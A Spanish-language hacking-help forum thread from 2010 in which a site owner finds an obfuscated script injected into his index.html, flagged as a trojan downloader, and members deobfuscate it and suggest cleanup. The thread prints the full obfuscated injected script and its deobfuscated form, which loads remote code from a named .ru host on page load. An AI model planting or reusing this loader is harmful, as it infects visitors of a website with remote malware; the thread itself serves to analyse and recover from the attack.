Me hackearon y dejaron un regalo. ayuda!

Iniciado por darkgx, 14 Mayo 2010, 23:06 PM

0 Miembros y 1 Visitante están viendo este tema.

darkgx

Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano.  :-\ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto  :-\

<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->


Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo :o

:'( ayudaaaaaaaaaaaaaaaaaa
:-(
EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta  :o es un archivo .js se llama  sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa????????????  :(

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox  :o

.:WindHack:.

Borra las Cookies, el historial de navegación y los archivos temporales de internet.

Saludos,

Follow me on Twitter: @windhack | Visit my website: www.daw-labs.com

"The only thing they can't take from us are our minds."

invisible_hack

#2
Para mi que es algun tipo de capturador de cookies de sesión, para volver a robarte la sesión en cuanto te volvieses a loguear...lo digo por...


d214af83de230538e9ec96da2945cae1


Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Bueno, un saludo...
"Si no visitas mi blog, Chuck te dará una patada giratoria"

cgvwzq

Código (javascript) [Seleccionar]
function G(){
_l=document.createElement("script");
_l["defer"]="1";
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
document.body["appendChild"](_l);
};


Ese es el script desofuscado...
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ



Novlucker

El sitio esta marcado como dañino y el navegador me bloquea, y al ingresar no consigo que me muestre nada, ya he probado con muchos user-agent y diferentes navegadores, pero nada de nada  >:(

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

darkgx


CitarBorra las Cookies, el historial de navegación y los archivos temporales de internet.
Listop  :P

CitarY si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo  :( asi que...

si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web  :-\ por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error.

Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron  :)

Saludos, espero que alguien pueda ayudarme  :(

Novlucker

Es un servidor gratuito? un wordpress?
Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas :P

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

darkgx

CitarEs un servidor gratuito? un wordpress?
Si, es un servidor gratuito

CitarOtra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas
Ok  ;D, ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas.
AH! tambien cambie la contraseña de mi host

Saludos  :)

darkgx

#8
Ahhh! el NOD32 me detecta muchas veces que mi pc ah querido conectarse a otro lado!! y esto me resulto familiar

Código (javascript) [Seleccionar]

function G(){ _l=document.createElement("script"); _l["defer"]="1"; _l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php"; document.body["appendChild"](_l);}




ahora que lo veo bien me doy cuenta de esto:
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
Ahora estas son algunas screenshot que saque de cuando mi pc o otra maquina remota se quiso conectar a mi. >:( Mientras digo que creo que esto fue por que un contacto mio del msn, me paso un link y yo lo clickie.. pero era una persona en quien confiaba, no suelo entrar a cualquier link raro pero bueno, no parecia tan raro este  :xD creo que de ahi viene todo esto y es la misma persona.





Bueno creo que ya se abran dado cuenta de que la direccion es la misma que la que mostro cgvwzq, tambien capture la ip y a que puerto se conecto.

Bueno despues de ver que se conecto a un puerto ( el 1125) lo blockee/cerre, pero despues se vuelve a conectar a otro puerto  :xD me re cago...

ahi esta la ip resuelta: ns208753.ovh.net , al parecer es una ip dinamica asique si bloqueo la ip igual va a segir   :-\ aunque hace 2 dias que no me alerta el antivirus.

El nombre del archivo era Abril06.jpg.exe no se como no me di cuenta  :xD . es el mismo tipo el que hackeo la web. debo tener algun keylogger  :huh:

Bueno ya no se que hacer le pase el NOD23, el RegSeeker y el Malwarebytes actualizado y no paso nada  :(

PD: Ya se que no se puede hacer doble post, pero quise aprovechar lo que dijo cgvwzq.

Saludos  :¬¬

winroot

#9
actualiza tu av, inicia en modo seguro sin red y escanea tu pc completamente.

si el problema sigue, tendrás que enviarnos un log de hijackthis o algo  por el estilo.
por cierto
como  hizo para  desofuscar el script?

el código de la web ahora se los paso.
saludos
edit:
ni usando el    get desde cmd.exe se puede abrir la página.
intenté con ie7, y me dice que no puede descargar el archivo.

parece ser, que es un script preparado para un   trojan.downloader espesífico
saludos
Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com